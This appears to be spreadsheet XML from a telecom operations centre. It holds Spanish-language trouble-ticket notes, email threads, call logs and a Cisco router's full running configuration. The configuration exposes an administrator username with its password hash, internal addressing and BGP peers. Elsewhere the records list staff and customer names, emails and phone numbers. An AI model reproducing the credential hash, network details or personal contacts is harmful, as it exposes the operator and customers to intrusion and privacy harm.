CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: VIERNES, 10 DE JUNIO DE 2022 05:47
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GODINEZ MYURY FRIDA IRAIS &lt;FGMYURY@UNINET.COM.MX&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC :: TICKET CNOC QCRL000119::: "FUERA DE SERVICIO"
ESTIMADOS BUEN DÍA,
NOS APOYAN CON SUS AVANCES?
BEST REGARDS | SALUDOS CORDIALES
   	DANIEL BRUGADA HERNÁNDEZ
OPERADOR CIAP GESTION Y SOPORTE
TEL. (55) 5174 5299</t>
  </si>
  <si>
    <t>***--- SE PROCEDE CON CIERRE DE TICKET, CL REPORTA PERDIDA DE PAQUETES Y ESTE ES POR CAIDA --**
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 05:38
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GARCIA SANCHEZ E SERGIO IVANHOE &lt;SGSANCHE@UNINET.COM.MX&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC ::: IMCRL004792 ::: LINK DOWN
BUEN DIA TEAM
EL TICKET QUE MENCIONAN ERA PARA OTRA PETICIÓN, PARA ESTA NUEVA EL CLIENTE REPORTA  PERDIDA DE PAQUETES, QUEDAMOS AL PENDIENTE SABER SI SE DARÁ SEGUIMIENTO CON ESE TICKET O GENERARA UNO NUEVO, COMPARTIMOS EVIDENCIA.
ADMIN@NICOYACED301-SWB-CLI&gt; PING 185.125.225.126 ROUTING-INSTANCE INET-PRI-1-TRANSPORT-VR COUNT 1000 PACKET-SIZE 1000 DF-BIT ENABLE RAPID ENABLE
PING 185.125.225.126 (185.125.225.126) 1000(1028) BYTES OF DATA.
................................................................
--- 185.125.225.126 PING STATISTICS ---
1000 PACKETS TRANSMITTED, 936 RECEIVED, 6% PACKET LOSS, TIME 13290MS
RTT MIN/AVG/MAX/MDEV = 64.111/71.851/396.087/14.590 MS, PIPE 32, IPG/EWMA 13.303/82.133 MS
[OK][2022-06-10 20:58:44]
ADMIN@NICOYACED301-SWB-CLI&gt;
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>***--- CL CONTINUA DANDO SEGUIMIENTO EN COLAS DISTINTAS, SE RESPONDE CORREO Y SE ADJUNTA COLA DONDE SE TIENE EL  SEGUIMIENTO--**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 03:42
PARA: CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GARCIA SANCHEZ E SERGIO IVANHOE &lt;SGSANCHE@UNINET.COM.MX&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC ::: IMCRL004792 ::: LINK DOWN
BUENOS DÍAS ESTIMADO SR. CARRILLO.
                RESPECTO A SU SOLICITUD ADJUNTO COLA DE CORREO CON EL SEGUIMIENTO PARA EL TICKET SD1133800.
ACTUALMENTE EL SERVICIO SE ENCUENTRA EN MONITOREO YA QUE DE NUESTRO LADO NO SE OBSERVAN EVENTOS O PERDIDAS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE HABLÓ CON OSWALDO HERNÁNDEZ/CLIENTE 00 525551745299 INDICA QUE VERIFICARÁ LAS PRUEBAS QUE SE LE ENVIÓ, CONTESTARÁ A LA BREVEDAD.
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC :: TICKET CNOC QCRL000119::: "FUERA DE SERVICIO"</t>
  </si>
  <si>
    <t>***---  TELMEX PIDE MONITOREO MIENTRAS VALIDA CON SU CL FINAL -**
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: VIERNES, 10 DE JUNIO DE 2022 05:59
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GODINEZ MYURY FRIDA IRAIS &lt;FGMYURY@UNINET.COM.MX&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC :: TICKET CNOC QCRL000119::: "FUERA DE SERVICIO"
ESTIMADOS,
GRACIAS POR LA INFORMACIÓN, FAVOR DE MANTENER EL TICKET EN MONITOREO MIENTRAS VALIDAMOS CON EL CLIENTE.
BEST REGARDS | SALUDOS CORDIALES
   	DANIEL BRUGADA HERNÁNDEZ
OPERADOR CIAP GESTION Y SOPORTE
TEL. (55) 5174 5299</t>
  </si>
  <si>
    <t>***--- TELMEX COMPARTE CONTACTO LOCAL PARA GESTIONAR ACCESO DE SER NECESARIO  --**  SE SOLICITA APOYO A CNOC
DE: BRUGADA HERNANDEZ DANIEL [MAILTO:DBRUGADA@UNINET.COM.MX]
ENVIADO EL: VIERNES, 10 DE JUNIO DE 2022 01:56
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GODINEZ MYURY FRIDA IRAIS &lt;FGMYURY@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002347194OC :: TICKET CNOC QCRL000119::: "FUERA DE SERVICIO"
ESTIMADOS,
NOS AYUDAN CON SUS AVANCES?
EN CASO REQUIERAN ACCESO, FAVOR DE CONTACTAR A JOSIE ESTEBAN: +506 6057 3819
BEST REGARDS | SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4596163</t>
  </si>
  <si>
    <t>SE REALIZA PRUEBA DE EQUIPOS CON EL CLIENTE SE REINICIA EL ROUTER  CISCO AL CUAL VA DIRECTAMENTE LA FDIBRA EN UN MODULO SE VE UP DESDE EL PE PERO NO SE LOGRA ALCANZAR POSIBLE DESCONFIGURACION DE CISCO EL CLIENTE SOLICITA APOYO PAARA CAMBIAR EL EQUIPO YA QUE HA TENIDO MUCHO INCONVENIENTE CON EL MISMO QUE SE DESCONFIGURA.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN JIMENEZ AL 31859746  CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001410580
**</t>
  </si>
  <si>
    <t>** SE LLAMA A  CLIENTE CRISTIAN JIMENEZ AL 504 31859746 INFORMA QUE YA INGRESARON LOS TECNICOS Y QUE YA ESTAN TRABAJANDO **
-ID 2001364887
**</t>
  </si>
  <si>
    <t xml:space="preserve">ESTIMADOS SOLICITO EL APOYO PARA LA VISITA PERSONAL LAS 24 HORAS ESPERAN EN EL LUGAR INDICAR CRISTIAN JIMENES
FALLA: 		F4596163
NOMBRE DEL CLIENTE: 	GUAMANET	
UBICACIÓN: 		SANTA CRUZ DE YOHOA BELLA VISTA A 1 CUADRA AL OESTE DE LA CHATARRERA GUAMANET_SANTA_CRUZ. 		
CONTACTO EN SITIO:	CRISTIAN JIMENEZ 31859746 	
HORARIO DE ATENCION:	24 HORAS 	
GESTIÓN DE PERMISOS: 	LLEVAR SOLAMENTE IDENTIFICACION
ÚLTIMA MILLA:	    1529207/_/IX10M_GUAMANET_SCY01 CVILHNI2N1D1EBD1----------------10.192.129.78----------- GE1/0/4.765(10G)
EQUIPO DE ACCESO (SW):	  CSCYHNLJN1D1EBD1--------------10.192.129.45-----------PORT-CHANNEL1.765
TIPO DE ENLACE:	FO / DATOS	
PROBLEMA QUE REPORTA: 	CAIDA TOTAL SE REALIZA PRUEBAS DE 1ER NIVEL Y SE VALIDA QUE SE TIENE UP LA FIBRA OPTICA PERO SE ENCUENTRA CAIDO A NIVEL WAN
POSIBLE PROBLEMA DE DESCONFIGURACION	
ACCIONES A TOMAR:	FAVOR ENVIAR PERSONAL PARA REVISAR CISCO DODNE LLEGA LA FIBRA YA QUE EL PUERTO ESTA UP PERO A NIVEL WAN NO LEVANTA POSIBLE PROBLEMA DE CONFIGURACION  	
RED DE COBRE:	</t>
  </si>
  <si>
    <t>** SE LLAMA A  CLIENTE CRISTIAN JIMENEZ AL 504 31859746 NO RESPONDE || ENVIA A BUZON **
-ID 2001344512
**</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE CONTACTAR CON CLIENTE CRISTIAN JIMENEZ 504 31859746 (ID 2001342957 / 2001343020), SIN EMBARGO, NO SE LOGRA LA COMUNICACIÓN CON ÉL. ***</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE CONTACTAR NUEVAMENTE CON CLIENTE CRISTIAN 504 31859746 (ID 2001350687), PERO NO SE LOGRA LA COMUNICACIÓN NUEVAMENTE ***</t>
  </si>
  <si>
    <t>F4596165</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MANUEL BERGES AL  23159925 EXT 1666 |  CONTESTA EL SEÑOR GERMAN MORALES QUIEN SOLICITA QUE SE DEJE EN OBSERVACION PARA LAS 15:00 HRS **
-ID 2001345813
**</t>
  </si>
  <si>
    <t>NO SE LOGRA DESCARGAR LA GRÁFICA QUE GESTIÓN N1 ADJUNTÓ EN FALLA; SE PIDE APOYO A GESTOR ASIGNADO ENVIAR PRUEBAS A CLIENTE PARA SEGUIMIENTO Y/O VALIDAR SERVICIO.
ASUNTO: RE: REVISIÓN DE SERVICIO DE INTERNET ID 412500001 | 07/06/2022</t>
  </si>
  <si>
    <t>F4596181</t>
  </si>
  <si>
    <t>SE HABLÓ CON MALAQUÍAS PANJOJ/CLIENTE 22437253 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4596203</t>
  </si>
  <si>
    <t>DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 20:37
PARA: W.ARROYOARIAS@DXC.COM &lt;W.ARROYOARIAS@DXC.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
ASUNTO: SEGUIMIENTO TTK SD1133377
ESTIMADO CLIENTE SE REALIZA DIAGNOSTICO A NIVEL DE ULTIMA MILLA SE ENCUENTRA OPERATIVO POR NUESTRA PARTE EL CPE NO HA TENIDO EVENTOS RECIENTES SOLICITAMOS SU APOYO PARA PODER VALIDAR QUE SE ENCUENTR OPERATIVO.
*APR 28 23:33:23.094: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (190.148.15.202)
*MAY  2 19:44:24.975: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (190.148.15.202)
*MAY  4 15:13:43.044: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*MAY  4 15:25:02.684: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*MAY  4 16:11:01.284: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN  8 19:11:49.919: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN  8 19:38:47.559: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
CC_FEMSA_CR_CALLEBLANCOS#
SHOW CLOCK
*00:43:41.459 UTC FRI JUN 10 2022
CC_FEMSA_CR_CALLEBLANCOS#</t>
  </si>
  <si>
    <t>SE PROCEDE A ENVIAR CORREO AL CLIENTE PARA VALIDAR A NIVEL QUE EL EQUIPO A NIVEL WAN SE ENCUENTRA OPERATIVO Y SIN PERDIDAS
*APR 28 23:33:23.094: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (190.148.15.202)
*MAY  2 19:44:24.975: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (190.148.15.202)
*MAY  4 15:13:43.044: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*MAY  4 15:25:02.684: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*MAY  4 16:11:01.284: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN  8 19:11:49.919: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
*JUN  8 19:38:47.559: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLAROCR ON VTY0 (10.201.1.89)
CC_FEMSA_CR_CALLEBLANCOS#
SHOW CLOCK
*00:43:41.459 UTC FRI JUN 10 2022
CC_FEMSA_CR_CALLEBLANCOS#</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO A NIVEL WAN NO SE TIENE INCONVENIENTES SE ENCUENTRA OPERATIVO SIN PERDIDA DE PAQUETES EL SERVICIO.
ROUTER CPE ACTIVO HACE 2 AÑOS.
CISCO IOS SOFTWARE, C3900 SOFTWARE (C3900-UNIVERSALK9-M), VERSION 15.4(3)M3, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2015 BY CISCO SYSTEMS, INC.
COMPILED FRI 05-JUN-15 15:47 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M16, RELEASE SOFTWARE (FC1)
CC_FEMSA_CR_CALLEBLANCOS UPTIME IS 2 YEARS, 21 WEEKS, 2 DAYS, 8 HOURS, 50 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM IMAGE FILE IS "FLASH0:C3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3925-CHASSIS (REVISION 1.0) WITH C3900-SPE100/K9 WITH 944128K/104448K BYTES OF MEMORY.
PROCESSOR BOARD ID FJC2016D0KF
3 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 72 BITS WIDE WITH PARITY ENABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
255488K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*1  	  C3900-SPE100/K9       FOC20060D9H
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C3900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
UC            NONE                 NONE           NONE
DATA          DATAK9               RIGHTTOUSE     DATAK9
NTWKESS       NONE                 NONE           NONE
COLLABPRO     NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_FEMSA_CR_CALLEBLANCOS#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 14246 BYTES
!
! LAST CONFIGURATION CHANGE AT 19:38:47 UTC WED JUN 8 2022 BY CLAROCR
!
VERSION 15.4
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_FEMSA_CR_CALLEBLANCOS
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
!
NO AAA NEW-MODEL
MEMORY-SIZE IOMEM 10
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
IP VRF FEMSA_LITE
 RD 1:1
!
!
!
!
NO IP DOMAIN LOOKUP
IP CEF
NO IPV6 CEF
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID C3900-SPE100/K9 SN FOC20060D9H
LICENSE ACCEPT END USER AGREEMENT
LICENSE BOOT MODULE C3900 TECHNOLOGY-PACKAGE DATAK9
!
!
VTP DOMAIN CLARO.COM.CR
VTP MODE TRANSPARENT
USERNAME CLAROCR PRIVILEGE 15 SECRET 5 $1$QPD7$YED2LLY79FTPYYRQ1QFR50
!
REDUNDANCY
!
!
!
CLASS-MAP MATCH-ANY RPVM_MGMNT_ROUTING
 MATCH IP DSCP CS7
 MATCH IP DSCP CS6
CLASS-MAP MATCH-ANY REAL-TIME
 MATCH IP DSCP EF
 MATCH IP DSCP CS3
 MATCH IP DSCP CS5
 MATCH IP RTP 16384 16383
 MATCH ACCESS-GROUP NAME ACL_QOS_VOICE_SIGNALING
 MATCH ACCESS-GROUP NAME ACL_QOS_VOICE_RTP
 MATCH ACCESS-GROUP NAME ACL_QOS_TEAMS_VOICE
 MATCH ACCESS-GROUP NAME ACL_QOS_KOF_VOICE
CLASS-MAP MATCH-ANY RPVM_VOZ
 MATCH IP DSCP CS3
 MATCH IP DSCP CS5
 MATCH IP DSCP EF
CLASS-MAP MATCH-ANY CRITICAL-DATA
 MATCH IP DSCP CS2
 MATCH IP DSCP AF31
 MATCH IP DSCP AF32
 MATCH IP DSCP AF33
 MATCH PROTOCOL DHCP
 MATCH PROTOCOL DNS
 MATCH PROTOCOL KERBEROS
 MATCH ACCESS-GROUP NAME ACL_QOS_KOF_CRITICAL_DATA
CLASS-MAP MATCH-ANY RPVM_VIDEO
 MATCH IP DSCP AF41
 MATCH IP DSCP AF42
 MATCH IP DSCP AF43
CLASS-MAP MATCH-ANY BUSINESS-DATA
 MATCH IP DSCP CS1
 MATCH IP DSCP AF21
 MATCH IP DSCP AF22
 MATCH IP DSCP AF23
 MATCH ACCESS-GROUP NAME ACL_QOS_TEAMS_APPSHARING
 MATCH ACCESS-GROUP NAME ACL_QOS_KOF_BUSINESS_DATA
CLASS-MAP MATCH-ANY RPVM_BUSINESS
 MATCH IP DSCP CS1
 MATCH IP DSCP AF21
 MATCH IP DSCP AF22
 MATCH IP DSCP AF23
CLASS-MAP MATCH-ANY VIDEO
 MATCH IP DSCP AF41
 MATCH IP DSCP AF42
 MATCH IP DSCP AF43
 MATCH ACCESS-GROUP NAME ACL_QOS_VIDEO
 MATCH ACCESS-GROUP NAME ACL_QOS_TEAMS_VIDEO
 MATCH ACCESS-GROUP NAME ACL_QOS_KOF_VIDEO
CLASS-MAP MATCH-ANY MANAGEMENT-PROTOCOLS
 MATCH IP DSCP CS7
 MATCH IP DSCP CS6
 MATCH PROTOCOL BGP
 MATCH PROTOCOL EIGRP
 MATCH ACCESS-GROUP NAME ACL_QOS_MANAGEMENT_PROTOCOLS
CLASS-MAP MATCH-ANY RPVM_DATOS_CRITICOS
 MATCH IP DSCP CS2
 MATCH IP DSCP AF31
 MATCH IP DSCP AF32
 MATCH IP DSCP AF33
CLASS-MAP MATCH-ANY MARK.MT
 MATCH CLASS-MAP MANAGEMENT-PROTOCOLS
CLASS-MAP MATCH-ANY MARK.VD
 MATCH CLASS-MAP VIDEO
CLASS-MAP MATCH-ANY MARK.BS
 MATCH CLASS-MAP BUSINESS-DATA
CLASS-MAP MATCH-ANY MARK.CD
 MATCH CLASS-MAP CRITICAL-DATA
CLASS-MAP MATCH-ANY MARK.RT
 MATCH CLASS-MAP REAL-TIME
!
POLICY-MAP QOS_WAN_140M_RPVM_PB22_IN
 CLASS REAL-TIME
  POLICE CIR PERCENT 12
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
 CLASS MANAGEMENT-PROTOCOLS
  POLICE CIR PERCENT 10
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION TRANSMIT
 CLASS VIDEO
  POLICE CIR PERCENT 15
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
 CLASS CRITICAL-DATA
  POLICE CIR PERCENT 25
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION TRANSMIT
 CLASS BUSINESS-DATA
  POLICE CIR PERCENT 25
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION TRANSMIT
 CLASS CLASS-DEFAULT
  POLICE CIR PERCENT 18
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION TRANSMIT
POLICY-MAP QOS_140M_L2-POLICE_IN
 CLASS CLASS-DEFAULT
  POLICE CIR 143360000
   SERVICE-POLICY QOS_WAN_140M_RPVM_PB22_IN
POLICY-MAP RPVM_PB22_OUT
 CLASS RPVM_MGMNT_ROUTING
  BANDWIDTH PERCENT 4
  QUEUE-LIMIT 32 PACKETS
 CLASS RPVM_VOZ
  PRIORITY PERCENT 13
 CLASS RPVM_VIDEO
  BANDWIDTH PERCENT 25
  POLICE CIR PERCENT 25 CONFORM-ACTION TRANSMIT  EXCEED-ACTION DROP
 CLASS RPVM_DATOS_CRITICOS
  BANDWIDTH PERCENT 25
 CLASS RPVM_BUSINESS
  BANDWIDTH PERCENT 25
 CLASS CLASS-DEFAULT
  BANDWIDTH PERCENT 7
POLICY-MAP RPVM_PB22_SHAPE_OUT
 CLASS CLASS-DEFAULT
  SHAPE AVERAGE PERCENT 100
   SERVICE-POLICY RPVM_PB22_OUT
POLICY-MAP QOS_WAN_140M_RPVM_PB22_OUT
 CLASS REAL-TIME
  PRIORITY PERCENT 12
 CLASS MANAGEMENT-PROTOCOLS
  BANDWIDTH PERCENT 5
  RANDOM-DETECT DSCP-BASED
 CLASS VIDEO
  BANDWIDTH PERCENT 15
  RANDOM-DETECT DSCP-BASED
  POLICE CIR PERCENT 25
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
 CLASS CRITICAL-DATA
  BANDWIDTH PERCENT 25
  RANDOM-DETECT DSCP-BASED
 CLASS BUSINESS-DATA
  BANDWIDTH PERCENT 25
  RANDOM-DETECT DSCP-BASED
 CLASS CLASS-DEFAULT
  BANDWIDTH PERCENT 18
  RANDOM-DETECT DSCP-BASED
POLICY-MAP QOS_140M_L2-SHAPING_OUT
 CLASS CLASS-DEFAULT
  SHAPE AVERAGE 143360000
   SERVICE-POLICY QOS_WAN_140M_RPVM_PB22_OUT
POLICY-MAP RPVM_PB22_IN
 CLASS RPVM_MGMNT_ROUTING
  POLICE CIR PERCENT 15 CONFORM-ACTION TRANSMIT  EXCEED-ACTION TRANSMIT
 CLASS RPVM_VOZ
  POLICE CIR PERCENT 13 CONFORM-ACTION TRANSMIT  EXCEED-ACTION DROP
 CLASS RPVM_VIDEO
  POLICE CIR PERCENT 25 CONFORM-ACTION TRANSMIT  EXCEED-ACTION DROP
 CLASS RPVM_DATOS_CRITICOS
  POLICE CIR PERCENT 25 CONFORM-ACTION TRANSMIT  EXCEED-ACTION TRANSMIT
 CLASS RPVM_BUSINESS
  POLICE CIR PERCENT 25 CONFORM-ACTION TRANSMIT  EXCEED-ACTION TRANSMIT
 CLASS CLASS-DEFAULT
  POLICE CIR PERCENT 15 CONFORM-ACTION TRANSMIT  EXCEED-ACTION TRANSMIT
POLICY-MAP RPVM_PB22_SHAPE_IN
 CLASS CLASS-DEFAULT
  POLICE CIR PERCENT 100
   SERVICE-POLICY RPVM_PB22_IN
POLICY-MAP QOS_MARK_LAN_IN
 CLASS MARK.RT
  SET IP DSCP EF
 CLASS MARK.MT
  SET IP DSCP CS6
 CLASS MARK.VD
  SET IP DSCP AF41
 CLASS MARK.CD
  SET IP DSCP AF31
 CLASS MARK.BS
  SET IP DSCP AF21
 CLASS CLASS-DEFAULT
  SET IP DSCP DEFAULT
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP VRF FORWARDING FEMSA_LITE
 IP ADDRESS 10.99.65.210 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION LAN DEL CLIENTE
 IP VRF FORWARDING FEMSA_LITE
 IP ADDRESS 172.19.10.2 255.255.255.252
 DUPLEX FULL
 SPEED 1000
 SERVICE-POLICY INPUT QOS_MARK_LAN_IN
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN PRINCIPAL/_/CONTR0001285737OC/_/
 IP VRF FORWARDING FEMSA_LITE
 IP ADDRESS 10.201.1.90 255.255.255.252
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 1000
 SERVICE-POLICY INPUT QOS_140M_L2-POLICE_IN
 SERVICE-POLICY OUTPUT QOS_140M_L2-SHAPING_OUT
!
INTERFACE GIGABITETHERNET0/2
 NO IP ADDRESS
 SHUTDOWN
 DUPLEX AUTO
 SPEED AUTO
!
!
ROUTER BGP 64650
 BGP ROUTER-ID 172.19.10.2
 BGP LOG-NEIGHBOR-CHANGES
 NO BGP DEFAULT IPV4-UNICAST
 !
 ADDRESS-FAMILY IPV4 VRF FEMSA_LITE
  REDISTRIBUTE CONNECTED
  REDISTRIBUTE STATIC
  NEIGHBOR 10.201.1.89 REMOTE-AS 14754
  NEIGHBOR 10.201.1.89 DESCRIPTION DATOS_CLARO_BACKUP
  NEIGHBOR 10.201.1.89 FALL-OVER BFD
  NEIGHBOR 10.201.1.89 ACTIVATE
  NEIGHBOR 10.201.1.89 SEND-COMMUNITY
  NEIGHBOR 10.201.1.89 SOFT-RECONFIGURATION INBOUND
  NEIGHBOR 10.201.1.89 ROUTE-MAP FILTRO_TO_CLARO_OUT OUT
  NEIGHBOR 172.19.10.1 REMOTE-AS 65201
  NEIGHBOR 172.19.10.1 DESCRIPTION DATOS_CE_FEMSA_CR
  NEIGHBOR 172.19.10.1 VERSION 4
  NEIGHBOR 172.19.10.1 FALL-OVER BFD
  NEIGHBOR 172.19.10.1 ACTIVATE
  NEIGHBOR 172.19.10.1 AS-OVERRIDE
  NEIGHBOR 172.19.10.1 SOFT-RECONFIGURATION INBOUND
  NEIGHBOR 172.19.10.1 ROUTE-MAP FILTRO_FROM_FEMSA_CR_IN IN
 EXIT-ADDRESS-FAMILY
!
IP FORWARD-PROTOCOL ND
!
IP AS-PATH ACCESS-LIST 20 PERMIT ^65201$
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP ACCESS-LIST EXTENDED ACL_QOS_KOF_VIDEO
 REMARK --- KOF LOCAL VIDEOCONFERENCE ---
 PERMIT IP 10.124.30.32 0.0.0.15 ANY
 PERMIT IP ANY 10.124.30.32 0.0.0.15
IP ACCESS-LIST EXTENDED ACL_QOS_KOF_BUSINESS_DATA
 REMARK --- AZURE SERVERS NON-SAP ---
 PERMIT IP 10.145.254.0 0.0.0.255 ANY
 PERMIT IP ANY 10.145.254.0 0.0.0.255
 PERMIT IP 10.153.0.0 0.0.255.255 ANY
 PERMIT IP ANY 10.153.0.0 0.0.255.255
 PERMIT IP 10.154.0.0 0.0.255.255 ANY
 PERMIT IP ANY 10.154.0.0 0.0.255.255
 REMARK --- FEMSA MONTERREY APPS ---
 PERMIT IP 10.50.32.0 0.0.0.255 ANY
 PERMIT IP ANY 10.50.32.0 0.0.0.255
 PERMIT IP 10.50.70.0 0.0.0.255 ANY
 PERMIT IP ANY 10.50.70.0 0.0.0.255
IP ACCESS-LIST EXTENDED ACL_QOS_KOF_CRITICAL_DATA
 REMARK --- ACTIVE DIRECTORY DOMAIN CONTROLLERS &amp; DNS SERVERS ---
 PERMIT IP 191.100.210.0 0.0.0.255 ANY
